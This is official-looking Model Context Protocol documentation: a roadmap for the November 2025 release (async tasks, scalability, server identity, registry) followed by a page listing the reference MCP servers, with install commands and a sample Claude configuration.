The Model Context Protocol is rapidly evolving. This page outlines our priorities for **the next release on November 25th, 2025**, with a release candidate available on November 11th, 2025. To see what's changing in the upcoming release, check out the **[specification changelog](/specification/draft/changelog/)**.
For more context on our release timeline and governance process, read our [blog post on the next version update](https://blog.modelcontextprotocol.io/posts/2025-09-26-mcp-next-version-update/).
The ideas presented here are not commitments—we may solve these challenges differently than described, or some may not materialize at all. This is also not an *exhaustive* list; we may incorporate work that isn't mentioned here.
We value community participation! Each section links to relevant discussions where you can learn more and contribute your thoughts.
For a technical view of our standardization process, visit the [Standards Track](https://github.com/orgs/modelcontextprotocol/projects/2/views/2) on GitHub, which tracks how proposals progress toward inclusion in the official [MCP specification](https://modelcontextprotocol.io/specification/).
## Priority Areas for the Next Release
### Asynchronous Operations
Currently, MCP is built around mostly synchronous operations. We're adding async support to allow servers to kick off long-running tasks while clients can check back later for results. This will enable operations that take minutes or hours without blocking.
Follow the progress in [SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686).
### Statelessness and Scalability
As organizations deploy MCP servers at enterprise scale, we're addressing challenges around horizontal scaling. While [Streamable HTTP](https://modelcontextprotocol.io/specification/2025-03-26/basic/transports#streamable-http) provides some stateless support, we're smoothing out rough edges around server startup and session handling to make it easier to run MCP servers in production.
The current focus point for this effort is [SEP-1442](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1442).
### Server Identity
We're enabling servers to advertise themselves through [`.well-known` URLs](https://en.wikipedia.org/wiki/Well-known_URI)—an established standard for providing metadata. This will allow clients to discover what a server can do without having to connect to it first, making discovery much more intuitive and enabling systems like our registry to automatically catalog capabilities. We are working closely across multiple projects in the industry to rely on a common standard on agent cards.
### Official Extensions
As MCP has grown, valuable patterns have emerged for specific industries and use cases. Rather than leaving everyone to reinvent the wheel, we're officially recognizing and documenting the most popular protocol extensions. This curated collection will give developers building for specialized domains like healthcare, finance, or education a solid starting point.
### SDK Support Standardization
We're introducing a clear tiering system for SDKs based on factors like specification compliance speed, maintenance responsiveness, and feature completeness. This will help developers understand exactly what level of support they're getting before committing to a dependency.
### MCP Registry General Availability
The [MCP Registry](https://github.com/modelcontextprotocol/registry) launched in preview in September 2025 and is progressing toward general availability. We're stabilizing the v0.1 API through real-world integrations and community feedback, with plans to transition from preview to a production-ready service. This will provide developers with a reliable, community-driven platform for discovering and sharing MCP servers.
## Validation
To foster a robust developer ecosystem, we plan to invest in:
* **Reference Client Implementations**: demonstrating protocol features with high-quality AI applications
* **Reference Server Implementation**: showcasing authentication patterns and remote deployment best practices
* **Compliance Test Suites**: automated verification that clients, servers, and SDKs properly implement the specification
These tools will help developers confidently implement MCP while ensuring consistent behavior across the ecosystem.
## Get Involved
We welcome your contributions to MCP's future! Join our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to share ideas, provide feedback, or participate in the development process.
# Example Servers
Source: https://modelcontextprotocol.io/examples
A list of example servers and implementations
This page showcases various Model Context Protocol (MCP) servers that demonstrate the protocol's capabilities and versatility. These servers enable Large Language Models (LLMs) to securely access tools and data sources.
## Reference implementations
These official reference servers demonstrate core MCP features and SDK usage:
### Current reference servers
* **[Everything](https://github.com/modelcontextprotocol/servers/tree/main/src/everything)** - Reference / test server with prompts, resources, and tools
* **[Fetch](https://github.com/modelcontextprotocol/servers/tree/main/src/fetch)** - Web content fetching and conversion for efficient LLM usage
* **[Filesystem](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem)** - Secure file operations with configurable access controls
* **[Git](https://github.com/modelcontextprotocol/servers/tree/main/src/git)** - Tools to read, search, and manipulate Git repositories
* **[Memory](https://github.com/modelcontextprotocol/servers/tree/main/src/memory)** - Knowledge graph-based persistent memory system
* **[Sequential Thinking](https://github.com/modelcontextprotocol/servers/tree/main/src/sequentialthinking)** - Dynamic and reflective problem-solving through thought sequences
* **[Time](https://github.com/modelcontextprotocol/servers/tree/main/src/time)** - Time and timezone conversion capabilities
### Additional example servers (archived)
Visit the [servers-archived repository](https://github.com/modelcontextprotocol/servers-archived) to get access to archived example servers that are no longer actively maintained.
They are provided for historical reference only.
## Official integrations
Visit the [MCP Servers Repository (Official Integrations section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#%EF%B8%8F-official-integrations) for a list of MCP servers maintained by companies for their platforms.
## Community implementations
Visit the [MCP Servers Repository (Community section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-community-servers) for a list of MCP servers maintained by community members.
## Getting started
### Using reference servers
TypeScript-based servers can be used directly with `npx`:
```bash theme={null}
npx -y @modelcontextprotocol/server-memory
```
Python-based servers can be used with `uvx` (recommended) or `pip`:
```bash theme={null}
# Using uvx
uvx mcp-server-git
# Using pip
pip install mcp-server-git
python -m mcp_server_git
```
### Configuring with Claude
To use an MCP server with Claude, add it to your configuration:
```json theme={null}
{
"mcpServers": {
"memory": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-memory"]
},
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/path/to/allowed/files"
]
},
"github": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-github"],
"env": {
"GITHUB_PERSONAL_ACCESS_TOKEN": ""
}
}
}
}
```
## Additional resources
Visit the [MCP Servers Repository (Resources section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-resources) for a collection of other resources and projects related to MCP.
Visit our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to engage with the MCP community.